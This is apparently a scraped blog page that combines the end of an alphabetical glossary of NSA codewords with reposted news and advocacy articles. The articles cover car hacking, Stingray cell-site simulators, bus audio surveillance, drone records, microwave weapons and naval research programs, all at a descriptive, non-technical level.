TOTEGHOSTLY – Modular implant for windows mobile OS based on SB using CP framework, Freeflow-compliant so supported by TURBULENCE architecture

TOWERPOWER – NSA tool or database

TOXICARE – NSA tool

TOYGRIPPE – NSA’s CES database for VPN metadata

TRACFIN – NSA database for financial data like credit card purchases

TRAFFICTHIEF – Part of the TURBULENCE and the PRISM programs

TRAILBLAZER – NSA Program to analyze data carried on communications networks

TRAILMAPPER – NSA tool or database

TRANSX – NSA database

TREACLEBETA – TAO hacking against the Pakistani terrorist group Lashkar-e-Taiba

TREASUREMAP – NSA internet traffic visualization tool

TREASURETROVE – Analytic tool

TRIBUTARY – NSA provided voice threat warning network

TRIGGERFISH – Device to collect the content of digital cell phone calls (made by Harris Corp.)

TRINE – Predecessor of the UMBRA compartment for COMINT

TRINITY – Implant digital core concealed in COTTONMOUTH-I, providing ARM9 microcontroller, FPGA Flash and SDRAM memories

TRITON – Tool or database for TOR Nodes (CSEC?)

– Series of ELINT reconnaissance satellites (1994-2008)

TRYST – Covert listening post in the British embassy in Moscow

TUBE – Database for selected internet content?

TUMULT – Part of the TURBULENCE program

TUNINGFORK – Sustained collection linked to SEAGULLFARO, previously NSA database or tool for protocol exploitation

TURBINE – Active SIGINT: centralized automated command/control system for managing a large network of active computer implants for intelligence gathering (since 2010)

TURBOPANDA – The Turbopanda Insertion Tool allows read/write to memory, execute an address or packet; joint NSA/CIA project on Huawei network equipment

TURBULENCE (TU) – Integrate NSA architecture with several layers and sub-programs to detect threats in cyberspace (since 2005)

TURMOIL – Passive SIGINT sensors: high speed collection of foreign target satellite, microwave and cable communications, part of the TURBULENCE program Maybe for selecting common internet encryption technologies to exploit.

TURTLEPOWER -NSA tool

TUSKATTIRE – Ingest system for cleaning and processing DNR (telephony) data

TUTELAGE – Active defense system to monitor network traffic in order to detect malicious code and network attacks, part of the TURBULENCE program

TWEED – Retired SIGINT product codeword

TWISTEDKILT – Writes to Host Protected area on hard drive to implant Swap and its implant installer payload

TWISTEDPATH – NSA tool or database

TYPHON HX – GSM base station router network in box for tactical Sigint geolocating and capturing user

U

ULTRA – Decrypted high-level military Nazi messages, like from the Enigma machine

UMBRA – Retired compartment for the most sensitive COMINT material

UNIFORM – SIGINT Exchange Designator for Canada

UNITEDRAKE – Computer exploit delivered by the FERRETCANON system

USHER – Retired SIGINT product codeword

V

VAGRANT – Radar retro-reflector technique on video cable to reproduce open computer screens

VALIDATOR – Computer exploit delivered by the FERRETCANON system for looking whether a computer has security software, runs as user process on target OS, modified for SCHOOLMONTANA, initiates a call home, passes to SOMBERKNAVE, downloads OLYMPUS and communicates with remote operation center

– Decrypted intercepts of messages from Soviet intelligence agencies

VERDANT (VER) – Alleged SCI control system

VESUVIUS – Prototype quantum computer, situated in NSA’s Utah Data Center

VICTORYDANCE – Joint NSA-CIA operation to map WiFi fingerprints of nearly every major town in Yemen

VIEWPLATE – Processor for external monitor recreating target monitor from red video

VINTAGE HARVEST – Probably a military SIGINT tool

VITALAIR – NSA tool

VOICESAIL – Intelligence database

– Class of SIGINT spy satellites (1978-1989)

VOXGLO – Multiple award contract providing cyber security and enterprise computing, software development, and systems integration support

W

WABASH – The embassy of France in Washington DC

WAGONBED – Hardware GSM controller board implant on CrossBeam or HP Proliant G5 server that communicates over I2C interface

WALBURN – High-speed link encryption, used in various encryption products

WARPDRIVE – Joint venture between the German BND and another country with access for NSA (2013)

WATERWITCH – Hand-held tool for geolocating targeted handsets to last mile

WAVELEGAL – Authorization service that logs data queries

WEALTHYCLUSTER – Program to hunt down tips on terrorists in cyberspace (2002- )

WEASEL – Type 1 Cryptographic algorithm used in SafeXcel-3340

WEBCANDID – NSA tool or database

WESTPORT – The mission of Venezuela at the United Nations in New York

WILLOWVIXEN – Method to deploy malware by sending out spam emails that trick targets into clicking a malicious link

WISTFULTOLL – Plug-in for UNITEDRAKE and STRAITBIZARRE used to harvest target forensics via Windows Management Instrumentation and Registry extractions, can be done through USB thumb drive

WHIPGENIE (WPG) – ECI compartment for details about the STELLARWIND program

WHITEBOX – Program for intercepting the public switched telephone network?

WHITELIST – NSA tool

WHITETAMALE – Operation for collecting e-mails from Mexico’s Public Security Secretariat

WINDCHASER – Tool or program related to MARINA

WINDSORBLUE – Supercomputer program at IBM

WINDSTOP – Joint NSA-GCHQ unilateral high-volume cable tapping program

WINTERLIGHT – A QUANTUM computer hacking program in which Sweden takes part

WIRESHARK – Database with malicious network signatures

WITCH – Retired SIGINT product codeword

WITCHHUNT – ?

WOLFPOINT – SSO corporate partner under the STORMBREW program

WORDGOPHER – Platform to enable demodulation of low-rate communication carriers

WRANGLER – Database or system which focuses on Electronic Intelligence

X

– Program for finding key words in foreign language documents

XKEYSCORE (XKS) – Program for analysing SIGINT traffic

Y

YACHTSHOP – Sub-program of OAKSTAR for collecting internet metadata

YELLOWPIN – Printed circuit board digital core used with HOWLERMONKEY

YELLOWSTONE – NSA analytical database

YUKON – The embassy of Venezuela in Washington DC

Z

ZAP – (former?) database for texts

ZARF – Compartment of TALENT KEYHOLE for ELINT satellites, retired in 1999

ZESTYLEAK – Software implant that allows remote JETPLOW firmware installation, used by NSA’s CES unit

– See also this list of NSA codewords from 2002

Links and Sources

– List of NSA Code Names Revealed

– About What the NSA’s Massive Org Chart (Probably) Looks Like

– About Code Names for U.S. Military Projects and Operations

– National Reconnaissance Office: Review and Redaction Guide (pdf)

– About How Codes Names Are Assigned

– Wikipedia article about the Secret Service codename

– List of crypto machine designators

– Wikipedia article about the CIA cryptonym

– Article about Security Clearances and Classifications

– Listing in German: Marjorie-Wiki: SIGDEV

– William M. Arkin, Code Names, Deciphering U.S. Military Plans, Programs, adn Operations in the 9/11 World, Steerforth Press, 2005.

via Electrospaces.Blogspot.com

Science Faction?

Science Faction?

technology-based-future-bradbury-orwellIn a somewhat disturbing case of life imitating art, it seems that real world turmoil is catching up with classic science fiction projections of a dystopian future as envisioned by writers like George Orwell and Ray Bradbury — a world where the general populace is under constant surveillance, and the technology that we’ve become overly dependent on has become our greatest liability.

If the recent NSA debacle wasn’t alarming enough for you, Google recently acquired Nest, the smart device firm and home automation pioneer. Home automation, of course, means having  multiple devices (kitchen appliances, thermostats, locks and security cameras, etc.) equipped with wireless capability and controllable through an app on a smart device. Your phone, in essence, becomes a remote control for your entire house. Some systems, like the one which Samsung recently premiered at CES 2014, will only enable the company’s own products to interact with one another, and the more glitzy products like the ADT home security systems allow homeowners to control their thermostats and other electronics (regardless of brand) with their smart phone.

If it sounds too good to be true…that’s because it potentially is, as this article from Trend Labs explains. The IP configuration on the devices is simple and the security options are quite limited, leaving them easily penetrable by hackers and thieves. Part of the risk, of course, is that if you have a home security system that can be entirely disabled through a smartphone, a thief could hack into your accounts, deactivate your entire security system with the push of a mere button, and enter your home freely. All of your data becomes more accessible to hackers, and now Google will have even more comprehensive data to sell to third party candidates who can market products even more aggressively to you.

Orwell and Bradbury basically called the whole thing…

One of the great things about science-fiction is that, whatever paranoid projections it makes about future global conditions, it’s always very much a product of its own time.This news raises all sorts of issues for an overly imaginative person.

The situation is like George Orwell’s 1984, where the general public can’t even so much as think in privacy. Everyone is under constant surveillance, and the entire system is under the pretense that this is somehow what’s best for society.

The citizens of Orwell’s fictional Oceania all have “telescreens” in their apartments, which enables Big Brother (whether that’s merely a governmental agency monitoring the public or one chief observer is never entirely clear) to supervise every given moment of everyone’s lives, and to possess an absurd level of intel on every given person under the jurisdiction of their central government. Replace telescreens with tablets, and Big Brother with Facebook and Google, and ask yourself how much of a deviation this setup is from life as we know it today.

It also calls to mind a particularly eerie story penned by Ray Bradbury 1950 entitled August 2026: There Will Come Soft Rains. The story focuses on “a-day-in-the-life” of a fully automated home after the extinction of the human race. The house prepares meals, recites important dates and reminders through an intercom system with a pre-recorded voice. We come to learn, throughout the course of the story, that the family who owned the house have been wiped out. We hear about silhouettes permanently fixed unto the side of the homes, in a manner that evoked the victims of Hiroshima and Nagasaki who were vaporized in an atomic blast.

So Bradbury’s grim musings couldn’t have been more fitting for his time, and they are startlingly relevant now. Just as humans channel their ingenuity and creativity into constructive things, or things which enhance life for humanity (all of the advancements in home technology, for instance) the misapplication of that creativity — and the misapplication of technology itself– can have dire, even catastrophic, consequences on humanity.

Is it really as bad as all of that?

Only time will tell, but it does seem more and more likely that whatever minor conveniences the technology yields will hardly justify the potential security risks.

You would hope that, in some cases, paranoid science-fiction literature would help prevent future atrocities from occurring by anticipating them. It’s sort of comforting that we’ve not yet reached the place anticipated by Arthur C. Clarke, where computers have superior intellect to humans and can function, not only with autonomy, but willfully against people. It’s pretty disconcerting, however, that we seem to be drawing nearer and nearer to those imagined realities, not merely a novel thought and fodder for pop literature, but a grim facet of our day to day lives.

DARPA Hackers Show How Cars Can Be Remotely Controlled

DARPA Hackers Show How Cars Can Be Remotely Controlled

darpa-hacks-car-remote-prius

Hackers Chris Valasek and Charlie Miller have demonstrated from the backseat of a Toyota Prius that all you need is a Macbook and a USB cable in order to hack into a computer-controlled car.

Valasek is the director of security intelligence for IOActive and Miller is a security engineer for Twitter.

These two security researchers showed that they can turn off the breaks, for example, even if the driver is at the helm.

Using a grant from the Defense Advanced Research Projects Agency (DARPA), Miller and Valasek have been researching computerized car vulnerabilities since 2012 and will be displaying their findings at DEF CON, a hacker’s conference in Las Vegas next month.

Miller asserted that they “had full control of braking” and that they “disengaged the brakes so if you were going slow and tried to press the brakes they wouldn’t work. We could turn the headlamps on and off, honk the horn. We had control of many aspects of the automobile.”

• Turn off power to the steering
• Have the onboard GPS give incorrect directions
• Change the numbers on the speedometer
• Force the car to change direction

Miller explained: “At the moment there are people who are in the know, there are nay-sayers who don’t believe it’s important, and there are others saying it’s common knowledge but right now there’s not much data out there. We would love for everyone to start having a discussion about this, and for manufacturers to listen and improve the security of cars.”

Using the vehicle’s electronic control unit (ECU) and the on-board diagnostics port (OBD), Miller and Valasek gained control over a 2010 Ford Escape and Toyota Prius.

ECUs are embedded systems that “controls one or more of the electrical system or subsystems in a motor vehicle.”

The OBD is the “vehicle’s self-diagnostic and reporting” apparatus that “gives the vehicle owner or repair technician access to the status of the various vehicle sub-systems.”

A representative from Toyota explained that the hacker would have to be in the car to manipulate its systems.

He said: “Altered control can only be made when the device is connected. After it is disconnected the car functions normally. We don’t consider that to be ‘hacking’ in the sense of creating unexpected behavior, because the device must be connected – ie the control system of the car physically altered. The presence of a laptop or other device connected to the OBD [on board diagnostics] II port would be apparent.”

Hacking into cars that are remotely controlled, such as Google’s self-driving vehicles, is a concern and this researcher could uncover implications for security purposes.

In 2010, teams from the University of Washington (UW) and the University of California (UC) were able to breach the computer systems of cars using cellular phone connections, Bluetooth headsets and a CD.

Stefan Savage from UC explained that their research “explores how hard it is to compromise a car’s computers without having any direct physical access to the car.”

Computerized cars “contain cellular connections and Bluetooth wireless technology” that could be tapped into remotely and used to take over the controls of the vehicle, listen into the conversations taking place in the cab of the car and completely compromise the safety of the vehicle.

Because computer connections to cars are virtually indistinguishable from internet-connected computers, their propensity toward vulnerabilities from outside influences are similar.

Using an On-Star navigation unit, a hacker could utilize the controls a remote technician at the GPS corporation’s on-call center because they are fully capable of controlling a vehicle in the event of an accident or call from a customer.

With complete disregard for driver privacy, the Obama administration gave their consent to the National Highway Traffic Safety Administration (NHTSA) to mandate black box event data recorders (EDR) be installed in all new cars in the US.

The NHTSA says that by September 2014 all car and light trucks will be equipped with EDRs that will silently “record the actions of drivers and the responses of their vehicles in a continuous information loop.”

The information recorded by EDRs includes:

• vehicle speed
• whether the brake was activated in the moments before a crash
• crash forces at the moment of impact
• information about the state of the engine throttle
• air bag deployment timing and air bag readiness prior to the crash
• whether the vehicle occupant’s seat belt was buckled

The NHTSA claims that “EDRs do not collect any personal identifying information or record conversations and do not run continuously.”

Advanced EDRs can collect detailed information about drivers and their driving habits; including the size and weight of the driver, the seat position, the habits of the driver as well as passengers.

The excuse is the EDRs gather information about car crashes in the moments leading up to the accident that manufacturers can use to improve their safety measures when constructing vehicles. However, the government regulation utilizes surveillance technology with policies that do not outline the expressed use of the data collected in the EDRs.

Read More here.

Newly Released Drone Records Reveal Extensive Military Flights in U.S.

Newly Released Drone Records Reveal Extensive Military Flights in U.S.

us-navy-mq-8-drone

Via: Electronic Frontier Foundation:

Today EFF posted several thousand pages of new drone license records and a new map that tracks the location of drone flights across the United States.

These records, received as a result of EFF’s Freedom of Information Act (FOIA) lawsuit against the Federal Aviation Administration (FAA), come from state and local law enforcement agencies, universities and—for the first time—three branches of the U.S. military: the Air Force, Marine Corps, and DARPA (Defense Advanced Research Projects Agency).

While the U.S. military doesn’t need an FAA license to fly drones over its own military bases (these are considered “restricted airspace”), it does need a license to fly in the national airspace (which is almost everywhere else in the US). And, as we’ve learned from these records, the Air Force and Marine Corps regularly fly both large and small drones in the national airspace all around the country. This is problematic, given a recent New York Times report that the Air Force’s drone operators sometimes practice surveillance missions by tracking civilian cars along the highway adjacent to the base.

The records show that the Air Force has been testing out a bunch of different drone types, from the smaller, hand-launched Raven, Puma and Wasp drones designed by Aerovironment in Southern California, to the much larger Predator and Reaper drones responsible for civilian and foreign military deaths abroad. The Marine Corps is also testing drones, though it chose to redact so much of the text from its records that we still don’t know much about its programs.

via Cryptogon

Public Buses Across Country Quietly Adding Microphones to Record Passenger Conversations

Public Buses Across Country Quietly Adding Microphones to Record Passenger Conversations

MTA-bus-audio-recording

Transit authorities in cities across the country are quietly installing microphone-enabled surveillance systems on public buses that would give them the ability to record and store private conversations, according to documents obtained by a news outlet.

The systems are being installed in San Francisco, Baltimore, and other cities with funding from the Department of Homeland Security in some cases, according to the Daily, which obtained copies of contracts, procurement requests, specs and other documents.

The use of the equipment raises serious questions about eavesdropping without a warrant, particularly since recordings of passengers could be obtained and used by law enforcement agencies.

It also raises questions about security, since the IP audio-video systems can be accessed remotely via a built-in web server (.pdf), and can be combined with GPS data to track the movement of buses and passengers throughout the city.

The RoadRecorder 7000 surveillance system being marketed for use on public buses consists of a high-definition IP camera and audio recording system that can be configured remotely via built-in web server.

According to the product pamphlet for the RoadRecorder 7000 system made by SafetyVision (.pdf), “Remote connectivity to the RoadRecorder 7000 NVR can be established via the Gigabit Ethernet port or the built-in 3G modem. A robust software ecosystem including LiveTrax vehicle tracking and video streaming service combined with SafetyNet central management system allows authorized users to check health status, create custom alerts, track vehicles, automate event downloads and much more.”

The systems use cables or WiFi to pair audio conversations with camera images in order to produce synchronous recordings. Audio and video can be monitored in real-time, but are also stored onboard in blackbox-like devices, generally for 30 days, for later retrieval. Four to six cameras with mics are generally installed throughout a bus, including one near the driver and one on the exterior of the bus.

Cities that have installed the systems or have taken steps to procure them include San Francisco, California; Eugene, Oregon; Traverse City, Michigan; Columbus, Ohio; Baltimore Maryland; Hartford, Connecticut; and Athens, Georgia.

San Francisco transit authorities recently approved a $5.9 million contract to install an audio surveillance system on 357 buses and vintage trolley cars, paid for in full with a grant from DHS. The contract includes the option to expand the equipment to an additional 600 vehicles.

Concord, New Hampshire also used part of a $1.2 million economic stimulus grant to install its new video/audio surveillance system on buses, according to the Daily.

Transit officials say the systems will help improve the safety of passengers and drivers and resolve complaints from riders. But privacy and security expert Ashkan Soltani told the Daily that the audio could easily be coupled with facial recognition systems or audio recognition technology to identify passengers caught on the recordings.

In Eugene, Oregon, the Daily found, transit officials requested microphones that would be capable of “distilling clear conversations from the background noise of other voices, wind, traffic, windshields wipers and engines” and also wanted at least five audio channels spread across each bus that would be “paired with one or more camera images and recorded synchronously with the video for simultaneous playback.”

In 2009, transit officials in Baltimore, Maryland, backed down briefly from plans to install microphones in buses in that city after civil liberties groups complained that the systems would violate wiretapping laws and constitutional protections against illegal search and seizure. Transit authorities then asked the state’s attorney general to weigh-in on whether the systems violated wiretapping laws. After the attorney general indicated that signs warning passengers of the surveillance would help combat any legal challenges, transit officials pressed forward with their plans last month and announced the installation of an audio recording system on 10 public buses. The city plans to roll out the system on at least 340 additional buses.

via Wired

Biometric Voice-Identification Technology Leads to Arrests of Terrorist Suspects in Europe

Biometric Voice-Identification Technology Leads to Arrests of Terrorist Suspects in Europe

Officials who apparently thwarted an alleged terror plot against Europe used voiceprinting technology to catch several suspects.

The British Government Communications Headquarters, which snoops on criminal suspects and works with MI6 spies, used voice identification technology to help uncover the plot, AP says. Several of the voices were recorded along the Pakistan-Afghanistan border.

Voiceprinting compares known voice recordings to new conversations to determine who is speaking. It involves recording words to capture the frequencies associated with a person’s voice, and using statisical models to extrapolate speech patterns. Advocates say it is as accurate as a fingerprint, and can be more useful especially for monitoring overseas suspects.

“Advances in these types of technology have been key in thwarting plots and catching suspects,” an anonymous British government official said.

Critics say voiceprints can be inaccurate, however, because a person’s voice is affected by variables like mood and health.

The reputed plot involved Britain, France and Germany, sparking travel warnings this week. Suspects reportedly spoke of a Mumbai-style shooting spree, recalling the 2008 attacks that killed 166 people.

Police in southern France arrested 12 suspects Tuesday, AP reports.

The recent arrests are the not the first time criminals’ own voices have betrayed them. In 2007, police arrested Colombian drug kingpin Juan Carlos Ramirez Abadia, who used plastic surgery and multiple aliases to dodge authorities, after the US Drug Enforcement Agency matched his voice to a tape recording made by Colombian authorities. The Pentagon even uses voiceprinting in Iraq.

Law enforcement agencies are reportedly considering how a voice database could help prevent future plots, AP says. An Interpol official said voice samples could be stored and shared with its 188 member countries.

via PopSci

Stingrays: The Biggest Technological Threat to Cell Phone Privacy You Don’t Know About

Stingrays: The Biggest Technological Threat to Cell Phone Privacy You Don’t Know About

 

On Friday, EFF and the ACLU submitted an amicus brief in United States v. Rigmaiden, a closely-followed case that has enormous consequences for individuals’ Fourth Amendment rights in their home and on their cell phone. As the Wall Street Journal explained today, the technology at the heart of the case invades the privacy of countless innocent people that have never even been suspected of a crime.

Rigmaiden centers around a secretive device that federal law enforcement and local police have been using with increased frequency: an International Mobile Subscriber Identity locator, or “IMSI catcher.” These devices allows the government to electronically search large areas for a particular cell phone’s signal—sucking down data on potentially thousands of innocent people along the way—while attempting to avoid many of the traditional limitations set forth in the Constitution.

How Stingrays Work

The Stingray is a brand name of an IMSI catcher targeted and sold to law enforcement. A Stingray works by masquerading as a cell phone tower—to which your mobile phone sends signals to every 7 to 15 seconds whether you are on a call or not— and tricks your phone into connecting to it. As a result, the government can figure out who, when and to where you are calling, the precise location of every device within the range, and with some devices, even capture the content of your conversations. (Read the Wall Street Journal’s detailed explanation for more.)

Given the breadth of information that it can stealthily obtain, the government prefers the public and judges alike not know exactly how Stingrays work and they have even argued in court that it should be able to keep its use of the technology secret. The Electronic Privacy Information Center has filed a FOIA request for more information on Stingrays, but the FBI is dragging its feet and is sitting on 25,000 pages of documents explaining the device.

The Rigmaiden Case: An Illusory Warrant

In Rigmaiden, the government asked a federal judge in Northern California to order Verizon to assist in locating the defendant, who was a suspect in a tax fraud scheme. But after they received an order telling Verizon to provide the location information of an Aircard they thought to be the defendant’s, the government took matters into their own hands: they claimed this authorization somehow permitted its own use of a Stingray.

Not only did the Stringray find the suspect, Rigmaiden, but it also got the records of every other innocent cell phone user nearby.

The government now concedes that the use of the device was a “search” under the Fourth Amendment and claims it had a warrant, despite the fact that, as we explain in our brief, “the Order directs Verizon to provide the government with information and assistance, but nowhere authorizes the government to search or seize anything.”

In fact, the government’s application made no mention of an IMSI catcher or a Stingray, and only has a brief sentence about its plans buried at the end of an 18-page declaration: “the mobile tracking equipment ultimately generate[s] a signal that fixes the geographic position of the Target Broadband Access Card/Cellular Telephone.”

A judge initially signed off on this order, but clearly, the government did not accurately and adequately explain what it was really up to.

General Warrants: Unconstitutional, All You Can Eat Data Buffets

Beyond the government’s conduct in this specific case, there is an even broader danger in law enforcement using these devices to locate suspects regardless of whether they explain the technology to judges: these devices allow the government to conduct broad searches amounting to “general warrants,” the exact type of search the Fourth Amendment was written to prevent.

A Stingray—which could potentially be beamed into all the houses in one neighborhood looking for a particular signal—is the digital version of the pre-Revolutionary war practice of British soldiers going door-to-door, searching Americans’ homes without rationale or suspicion, let alone judicial approval. The Fourth Amendment was enacted to prevent these general fishing expeditions. As the Supreme Court has explained, a warrant requires probable cause for all places searched, and is supposed to detail the scope of the search to ensure “nothing is left to the discretion of the officer executing the warrant”.

But if uninformed courts approve the unregulated use of Stingrays, they are essentially allowing the government to enter into the home via a cellular signal at law enforcement’s discretion and rummage at will without any supervision. The government can’t simply use technology to upend centuries of Constitutional law to conduct a search they would be prevented from doing physically.

Stingrays Collect Data on Hundreds of Innocent People

And when police use a Stingray, it’s not just the suspects’ phone information the device sucks up, but all the innocent people around such suspect as well. Some devices have a range of “several kilometers,” meaning potentially thousands of people could have their privacy violated despite not being suspected of any crime. This is another fact the government didn’t fully explain to the magistrate judge in Rigmaiden.

The government now claims it protected privacy by deleting all third-party data on its own after it collected it. But the government’s unilateral decision to binge and purge comes with its own consequences. Now there’s no way to know what exactly the government obtained when it used the device.

Had the government told the court what it really was planning on doing and the amount of information it would obtain, the court may have exercised its constitutional role of ensuring the government narrowed its search. After all, it was for the court, not the government, to decide how best to balance the government’s need for information with third-party privacy, and any suspect’s future interest in access to potentially exculpatory information.

Enough Warrantless Excursions

Unfortunately, US government excuses for conducting warrantless searches are becoming all too familiar. Whether it’s the hundreds of thousands of searches for cell phone location information, the skyrocketing of warrantless surveillance of who and when you’re calling, or the NSA’s still-active warrantless wiretapping program, Americans are seeing their Fourth Amendment privacy rights under attack from all angles. We hope in this case and others like it, the court will prevent such violations of privacy from occuring again.

via EFF.org

Boeing Develops Flying Blackout Drone to Deliver Targeted EMP

Boeing Develops Flying Blackout Drone to Deliver Targeted EMP

While everyone in Washington is talking about the upcoming presidential debate today, one of the U.S. Air Force’s newest high-tech toys was taking big step — er, flight — forward.

The Counter-electronics High-powered Microwave Advanced Missile Project (CHAMP) is an effort to build a missile that flies over — not into — a target, be it an entire military base, neighborhood, or a even a lone tank and shuts down all the electronics inside without harming a soul. (Think of it almost as a mini-EMP in a rocket.) On Oct. 16, a CHAMP missile flew an hour-long preprogrammed route low over the Utah desert, “degrading and defeating” the electronics inside seven different targets. In a building along the route packed with computers, the screens all went dark as CHAMP sailed by, emitting a blast of high-power microwaves, according to CHAMP-maker Boeing’s Oct. 22 press release announcing the test flight. (The weapon even took out the remotely controlled TV cameras that were monitoring the tests, claimed Boeing.)

As the Chicago-based defense giant says in its press release, “CHAMP, which renders electronic targets useless, is a non-kinetic alternative to traditional explosive weapons that use the energy of motion to defeat a target.” (Side note: “energy of motion” is a nice way of saying that missiles, bombs, and bullets slam into things and explode.)

So, how does CHAMP fit into the Pentagon’s post Iraq and Afghan war plans? As everyone knows, the Defense Department is focusing on how to defeat new generations of air defense radars, surface to air missiles, anti ship missiles, and a host of other technologies that are specifically meant to keep American weapons systems at bay.

This means coming up with a fleet of new stealth bombers, fighters, and drone jets that can penetrate these defenses. It also means creating a bevy of long-range — or standoff weapons — capable of being launched by unstealthy jets far away from heavily defended targets. Where does something like CHAMP come in? As a door kicker. Launched from a stealth aircraft and designed to take out enemy air defense networks and command and control centers, CHAMP would pave the way for less stealthy jets and help to “blind” the enemy.

“In the near future, this technology may be used to render an enemy’s electronic and data systems useless even before the first troops or aircraft arrive,” said Keith Coleman, CHAMP program manager at Boeing’s Phantom Works division, in a press release.

Still, don’t expect to see CHAMP fielded soon. It’s simply meant to demonstrate that such a weapon is feasible. In the meantime, the Pentagon is buying EA-18G Growler electronic attack jets for the Navy while the Air Force and Marine Corps hope to use something called the Next Generation Jammer along with powerful Active Electronically Scanned Array radars (AESA radars can be used to jam other radars, in addition to many other things) on their F-35 Joint Strike Fighters to defeat enemy sensors. And don’t be surprised if the Navy decides to equip its planned fleet of stealthy combat drones, known as UCLASS, with some sort of electronic warfare gear aimed at jamming enemy electronics.

via KillerApps

Space Weapons: Russia’s Zombie Gun Technology

Space Weapons: Russia’s Zombie Gun Technology

http://youtu.be/fQG3YO9RrmQ

Military and technology analyst Andy Lightbody talked about the mind-altering ‘zombie’ gun being developed by Russia and North Korea’s failed missile testing.

Andy Lightbody was the Military & Aerospace Editor for CBS Radio, the Gulf War Military
Analyst for Channel 11 –Multi Media Television–Los Angeles (Now FOX News), and a regular guest on numerous shows seen and heard on CNN, the BBC, NHK and other international network programs. He was Host and Executive Producer of the (26-week) top-rated television show, HIGH TECHNOLOGY BUSINESS for FNN (The Financial News Network). And, as the High Technology Editor, was contributing the daily, military, aerospace, defense and terrorism coverage to the over 60 national affiliates of the Business Radio Network.

Background
There are reports coming from Russia that the Russian military is creating a super weapon that has been dubbed the “zombie gun” due to its immobilizing effect on those who are targeted.

Critics fear that a weapon as powerful as this could be used not only against Russia’s enemies, but also against the civilian population, including dissidents by the end of the decade.

Sources in Moscow have stated that Russian President Vladimir Putin described the new super weapon, which uses electromagnetic radiation which is similar to radiation found in common household microwaves, as “entirely new instruments for achieving political and strategic goals.”

The source added that Putin feels the use of “such high-tech weapons systems will be comparable in effect to nuclear weapons, but will be more acceptable in terms of political and military ideology.”

The announcement by Russian defense minister Anatoly Serdyukov regarding the implementation of these new weapons, made quickly and without much attention given from local media outlets, were part of a plan that fulfilled a campaign pledge by Putin.

Serdyukov said: “The development of weaponry based on new physics principles — direct-energy weapons, geophysical weapons, wave-energy weapons, genetic weapons, psychotropic weapons, and so on — is part of the state arms procurement program for 2011-2020.”

DARPA And Navy Reveal Advanced Technology For Naval Warfare

DARPA And Navy Reveal Advanced Technology For Naval Warfare

The Defense Advanced Research Projects Agency’s (DARPA) new director, Dr. Arati Prabhakar, will share her vision Oct. 22 at the Office of Naval Research (ONR) 2012 Naval Science and Technology Partnership Conference and ASNE Expo.
Prabhakar, who took the helm at DARPA on July 30, will take the podium at 11:30 a.m. on the event’s opening day in Crystal City, Va. Her participation underscores the importance of research partnerships to national security and the commitment to collaboration shared by DARPA, ONR and other Department of Defense research organizations.

”Technology is a critical lever for our national security in today’s complex world,” said DARPA Director Dr. Arati Prabhakar. ”At DARPA, along with our partners at ONR and the broad national research-and-development community, we aim to change what is possible with new technology.”

ONR and DARPA have partnered on a variety of research projects, including multiple endeavors to promote education in the science, technology, engineering and mathematics fields.

This year, the agencies teamed to co-sponsor the RevCon Challenge, a competition among college students to design connectors that more effectively conduct heat from radars and other military electronic systems. Based on the success of the competition, ONR and DARPA will host a second challenge in May.

Previously, the agencies also collaborated on the Second Language Learningprogram, which will reduce the time it takes for Sailors and Marines to learn other languages and cultures through virtual interaction with avatars.

Prabhakar is no stranger to interest areas shared by ONR, having first joined DARPA in 1986 as a program manager in advanced semiconductor technology and flexible manufacturing. She founded the agency’s microelectronics technology office before being appointed in 1993 by President Bill Clinton to lead theNational Institute of Standards and Technology.

She also has spent several years in the private sector, including a stint working with start-up companies and entrepreneurs in energy and efficiency technologies, consumer electronics components and semiconductor process and design technology.

Dr. Charles Wessner, director of Technology, Innovation and Entrepreneurship at theNational Academy of Sciences, also has been confirmed to speak at the conference. He and Prabhakar join a roster of heavy hitters for the conference that includes White House Office of Science & Technology Policy Director Dr. John P. Holdren, Assistant Secretary of the Navy for Research, Development and Acquisition Sean Stackley, Vice Chief of Naval Operations Adm. Mark Ferguson and Commandant of the Marine Corps Gen. James Amos, and others representing the domestic and international scientific community.

Focus areas at this year’s event include: autonomy and unmanned systems; assuring access to maritime battle space; expeditionary and irregular warfare; power projection and integrated defense; power and energy; warfighter performance; and total ownership cost.

Innovative Naval Prototypes (INPs) push the boundaries of our nation’s technical talent to deliver transformational warfighting capabilities to the U.S. Navy and Marine Corps. INPs reduce the acquisition risk of disruptive technologies and capabilities.Innovative Naval Prototypes explore high 6.2 and 6.3 technologies that can dramatically change the way naval forces fight. Programs in this category may be disruptive technologies which, for reasons of high risk or radical departure from established requirements and concepts of operation, are unlikely to survive without top leadership endorsement, and, unlike Future Naval Capabilities, are initially too high risk for a firm transition commitment from the acquisition community. INPs should be identified based on a balanced combination of naval need and technology exploitation. Investments should be planned with the critical mass needed to achieve a level of technology maturity suitable for transition in four to eight years.

Current INPs:
Autonomous Aerical Cargo/Utility System (AACUS): This Innovative Naval Prototype program explores advanced autonomous capabilities for reliable resupply/retrograde and, in the long term, casualty evacuation by an unmanned air vehicle under adverse conditions. Key features of AACUS include a vehicle autonomously avoiding obstacles while finding and landing at an unprepared landing site in dynamic conditions, with goal-directed supervisory control by a field operator with no special training.
Electromagnetic Railgun (EMRG): The Electromagnetic Railgun (EMRG) is a revolutionary long-range naval gun that will fire precision-guided hypervelocity projectiles to ranges greater than 200 nautical miles. Rather than gunpowder and rocket motors, the railgun will use electrical power to propel the projectiles. Its delivery of persistent, time-critical precision strikes without the use of propellants or explosive warheads will revolutionize warfighting capabilities from the sea.
Free Electron Laser (FEL): ONR is exploring the development of a laser capable of operating in a maritime environment and consistent with the Navy’s planned all-electric ship. The high average power infrared Free Electron Laser (FEL) provides intense beams of laser light that can be tuned to atmosphere-penetrating wavelengths.
Integrated Topside (InTop): The Integrated Topside (InTop) program provides an integrated, multi-function, multi-beam top-side aperture construct that has modular open radio frequency (RF) architecture, software defined functionality, synchronization, and optimization of RF functions for mission support electromagnetic interface mitigation.
Large Displacement Unmanned Undersea Vehicle (LDUUV): The LDUUV program will develop fully autonomous, long-endurance, land-launched unmanned undersea vehicles capable of operating near shore. It will extend and augment the current Navy platform capability. The LDUUV program will develop new air independent energy systems and core vehicle technologies to extend unmanned undersea vehicles endurance into months of operation time. Advanced autonomy and sensing will enable operation in the cluttered littoral environment.
Persistant Littoral Undersea Surveillance (PLUS): The Persistent Littoral Undersea Surveillance (PLUS) program provides effective, adaptive and persistent undersea surveillance of multiple quiet targets over large littoral areas.
